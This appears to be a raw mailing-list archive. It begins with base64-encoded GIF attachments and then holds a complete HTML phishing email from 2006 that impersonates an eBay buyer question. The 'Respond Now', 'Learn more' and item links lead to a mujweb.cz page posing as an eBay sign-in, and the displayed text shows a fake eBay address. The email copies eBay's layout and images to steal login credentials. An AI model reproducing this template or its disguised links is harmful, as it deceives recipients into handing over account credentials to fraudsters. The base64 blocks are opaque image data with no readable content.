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 G3f8ccgjl3xyyiu33MuAAAA7 ------=_NextPart_000_0006_01C6A6A1.8E932078 Content-Type: image/gif; name="creditor.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhRgC4AcYAAN++vqKah4yNdJyXgkVjM3F+XE5oO8qyq9e5t9q7usevp969vV9zS1ZtQpGQ eNWvtoM8emQRY76PpXw0dbN/nbyNpHwydWgWZoM9etOttdu5u6lylngscnQob9eyuKZulGwcaaFn kJZXiKVsk8ecrM+osnAhbNm1uYdCfZdZicCSp4tHgNGqs8KVqH83d51hjbuKo7SCnotIgLiHoXEk bdezuJJShdq2ureEoNKrtMSYqo5Mgq95mngtctawt8qgrnwzdd26vJpdi8aaq9O3tN69vr+Sp1xx SZmVgMOYqmF0Tdm3uty6vNKttd28vbuNpMacrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA AAAARgC4AQAH/oAAgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2u r7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn 6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAMKHEiwoMGDCBMqXMiwocOHEHsFEEARwAACAQoYEKDr AAEECQgoWEBAwIIABnQNYCDIQAAAIgEoIKBLQIMAOBXA1DlTl4MGCwjF7Jlrpk4AQYfSBCDgpa0A DAoIUBCg5AEBGGFyjMi1q9evYMOKHUu2rNmzaNOqXcu2rdu3/nDjyp1Lt67du3jz6t3Lt6/fv4AD Cx5MuLDhw4gTK17MuLHjx5AjS55MubLly5gza97MubPnz6BDN3oAIUIECRMiUABQwcKFCBgyaMBg egOHCB08IP0A4rXpEKZEmB5BIkKJDxFMnAgRAQWAFKZVnDC9ekSEFSySt9BgysV1AA9eFI8AAwAF 0wBKrwCQPUIMAK8llEB/6vWIQTIigAi6AT2ICMBVYBoJGph2wgwR0HBKDaZVMMhrNghiQwQXTBfB DABYF8ENC7ymAQoR4HBKC6blMEhtSP0ngw6mlQDADhQKosIFNICw2in9RRCUIKa9B8OAPJgWVA8R WCCIdTeo/jJhB4TQFoIPJkTwAQDCMbmAaTsAUGAELqBgww+n/AeCiIJk4F0EQJTXwn8mZMAclzm0 Z1qMvSC4QhAnCEEfLz0KEqQMvvwnRBBDgGCBbr2UIIILE+yAw46iRSrppJRWaumlmGaqKTZEKFBE AiOBCmlNBQBgxBFFnFpEL1IBgESpr/pSQBIAFOBArbd6YushASgxiAO3HlDAEUcgAUACR+hUxBEv JZEAAEq8FO0nSSxxSBJHMAHAAUog0ESxTmB7gAJHPEvEEQcMcu4B66KybhEFvCRAAas6ccQTGQny BKqDnOqEv6gs+4QR9ALArCDfQlGRq6UOEmusqRTw6lEHYgMQQLnxHrvrIBUt/EkAxhoiwBFb1SqA E+S+xKwCwzolyLTTgqJEw4UgcQQRg7B8RAFPCDLsrOiqi267oCDh8iDwhozLVc8W0mvTuDhxSBED QLHp1VhnrfXWXHft9ddggx0IADs= ------=_NextPart_000_0006_01C6A6A1.8E932078-- From [email protected] Fri Jul 14 03:00:39 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74443 invoked from network); 14 Jul 2006 03:00:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2006 03:00:39 -0000 Received: (qmail 60416 invoked by uid 500); 14 Jul 2006 03:00:29 -0000 Delivered-To: [email protected] Received: (qmail 60406 invoked by uid 99); 14 Jul 2006 03:00:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 13 Jul 2006 20:00:28 -0700 X-ASF-Spam-Status: No, hits=2.9 required=10.0 tests=DATE_IN_FUTURE_06_12,HTML_FONT_BIG,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,HTML_TAG_EXIST_TBODY,MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO landsat.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 13 Jul 2006 20:00:24 -0700 Received: by landsat.org (Postfix, from userid 501) id 08BDD2F1B3; Fri, 14 Jul 2006 06:01:18 -0400 (EDT) To: [email protected] From: [email protected] Subject: Message from eBay Member Reply-To: [email protected] Content-type: text/html Message-Id: <[email protected]> Date: Fri, 14 Jul 2006 06:01:18 -0400 (EDT) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 xmlns:x="urn:schemas-microsoft-com:xslt"> <TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=2 width="100%" border=0> <TBODY> <TR> <TD><FONT face="Verdana, sans-serif" color=#666666 size=1><STRONG></STRONG><BR>Your registered name is included to show this message originated from eBay. <A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>Learn more</FONT></A><FONT color=#00007f>.</FONT> </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=white border=0> <TBODY> <TR> <TD noWrap width="1%"><IMG src="http://pics.ebaystatic.com/aw/pics/uk/email/syiSessions/hdrLeft_13x39.gif"></TD> <TD noWrap width="98%" background=http://pics.ebaystatic.com/aw/pics/uk/email/syiSessions/imgSpan_5x39.gif><SPAN class=SectionTitle><FONT size=4><B>Question about Item -- Respond Now</B></FONT></SPAN></TD> <TD vAlign=bottom noWrap width="1%"><IMG alt=eBay src="http://pics.ebaystatic.com/aw/pics/uk/email/syiSessions/hdrRight_90x39.gif"></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD> <TABLE style="BORDER-RIGHT: #9999cc 1px solid; BORDER-LEFT: #9999cc 1px solid; BORDER-BOTTOM: #9999cc 1px solid" width="100%" bgColor=#eeeef8 border=0> <TBODY> <TR> <TD style="PADDING-LEFT: 8px" height=30><FONT face="Arial, Verdana" size=2>eBay sent this message on behalf of an eBay member via My Messages. Responses sent using email will go to the eBay member directly and will include your email address. Click the <B>Respond Now</B> button below to send your response via My Messages (your email address will not be included).</FONT> </TD></TR></TBODY></TABLE></TD> <TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif"></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></TD> <TD vAlign=top> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD vAlign=top> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=1 width="100%" align=center bgColor=#9999cc border=0> <TBODY> <TR bgColor=#9999cc height=26> <TD><FONT color=#ffffff>&nbsp;<SPAN class=SectionTitle>Question from eBay Member: gucas</SPAN></FONT></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR bgColor=#eeeeee> <TD> <TABLE cellSpacing=4 cellPadding=0 width="100%"> <TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD><FONT face="Arial, Verdana"><FONT size=2>Item: (<U><FONT color=#00007f>249-954-7210</FONT></U></FONT><FONT size=2>)</FONT></FONT></TD></TR> <TR> <TD><FONT face="Arial, Verdana" size=2>This message was sent while the listing was <B>active</B>.</FONT></TD></TR> <TR> <TD><FONT face="Arial, Verdana" size=2>gucas is a <B>potential buyer</B>.</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR bgColor=#c6c6c6> <TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR bgColor=#ffffff> <TD> <TABLE cellSpacing=0 cellPadding=4> <TBODY> <TR> <TD vAlign=top width="75%"><FONT face="Arial, Verdana"> <P>Hello , </P> <P>how much it is buy it now price?.</P> <P>please let me know if you accept PayPal or Money Orders for payment. Thanks </P> <P>Regards</P></FONT> <P><FONT face="Arial, Verdana" size=2><BR></P></FONT></TD> <TD vAlign=top align=middle width="22%"> <TABLE borderColor=#999999 cellSpacing=0 cellPadding=0 width="100%" bgColor=#eeeef8 border=1> <TBODY> <TR> <TD> <TABLE cellSpacing=3 cellPadding=3 width="100%"> <TBODY> <TR> <TD align=middle><FONT face="Arial, Verdana" size=2><B>Respond to this question in My Messages.</B></FONT> </TD></TR> <TR> <TD align=middle><A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><IMG alt="Respond Now" src="http://pics.ebaystatic.com/aw/pics/uk/email/message/btnRespondNow.gif" border=0></A></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD> <TD width="3%"></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD><IMG height=15 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR bgColor=#9c9c9c> <TD colSpan=3><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1 border=0></TD></TR> <TR bgColor=#d6deff height=22> <TD align=left width="1%"><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=16 border=0></TD> <TD align=left><FONT face="Arial, Verdana" size=2><B>Item Details</B></FONT> </TD></TR> <TR bgColor=#ffffff> <TD colSpan=3><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1 border=0></TD></TR> <TR bgColor=#fed73b> <TD colSpan=3><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1 border=0></TD></TR></TBODY></TABLE> <TABLE style="BORDER-RIGHT: #d6dcfe 1px solid; BORDER-TOP: #d6dcfe 1px solid; BORDER-LEFT: #d6dcfe 1px solid; BORDER-BOTTOM: #d6dcfe 1px solid" cellSpacing=0 cellPadding=0 width="100%" bgColor=white> <TBODY> <TR> <TD width="100%"> <TABLE cellSpacing=0 cellPadding=3 width="100%" border=0> <TBODY> <TR> <TD noWrap width="1%"><FONT face="Arial, Verdana" size=2></FONT></TD> <TD></TD></TR> <TR bgColor=#f4f4f4> <TD noWrap width="1%"><FONT face="Arial, Verdana" size=2>Item number: </FONT></TD> <TD><FONT style="BACKGROUND-COLOR: #f4f4f4" face="Arial, Verdana" size=2>249-954-7210</FONT></TD></TR> <TR> <TD noWrap width="1%"><FONT face="Arial, Verdana" size=2>End date: </FONT></TD> <TD><FONT face="Arial, Verdana" size=2>July-24-06&nbsp;21:06:59 PDT</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR> <TD><IMG height=8 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1 border=0></TD></TR> <TR> <TD><FONT face="Arial, Verdana" size=2>View item description:</FONT></TD></TR> <TR> <TD><FONT face="Arial, Verdana" color=#003399 size=2><A href="http://mujweb.cz/www/ssigninonebay/eBayISAPIdllSignInfavoritenav=2sid2=ruproduct=pp=co_partnerId=2ru=i1=ruparams=pageType=pa2=bshowgif=pa1=pUserId=errmsg=UsingSSL-runame-iteid=1/muie.html?r=2022" target=_blank><FONT color=#00007f>htps://cgi.ebay.com/ws/eBayISAPI.dll?</FONT><FONT color=#00007f>ViewItem&amp;item=249-954-7210&amp;sspagename=ADME:B:AAQ:UK:1</FONT></A></FONT></TD></TR> <TR> <TD><FONT color=#003399><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1 border=0></FONT></TD></TR> <TR> <TD><FONT face="Arial, Verdana" size=2>Thank you for using eBay</FONT></TD></TR> <TR> <TD><FONT face="Arial, Verdana" color=#0000bf size=2><A href="http://www.ebay.com/" target=_blank><FONT color=#00007f>h</FONT><FONT color=#00007f>ttp://www.ebay.com/</FONT></A></FONT></TD></TR> <TR> <TD><FONT color=#003399><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1 border=0></FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD> <TD vAlign=top width=10><FONT color=#003399><IMG src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></FONT></TD> <TD vAlign=top align=right width=188> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD> <TABLE style="BORDER-RIGHT: #6b7b91 1px solid; BORDER-TOP: #6b7b91 1px solid; BORDER-LEFT: #6b7b91 1px solid; BORDER-BOTTOM: #6b7b91 1px solid" cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR> <TD bgColor=#cad2dd><FONT color=#003399><IMG height=25 alt="Marketplace Safety Tip" src="http://pics.ebaystatic.com/aw/pics/uk/securityCenter/imgShield_25x25.gif" width=25 border=0></FONT></TD> <TD noWrap bgColor=#cad2dd><FONT face="Arial, Helvetica, Verdana, sans-serif" size=-1><B><A style="COLOR: #000000; TEXT-DECORATION: none" href="http://pages.ebay.co.uk/safetycentre" target=_blank>Marketplace Safety Tip</A></B></FONT> </TD> <TD 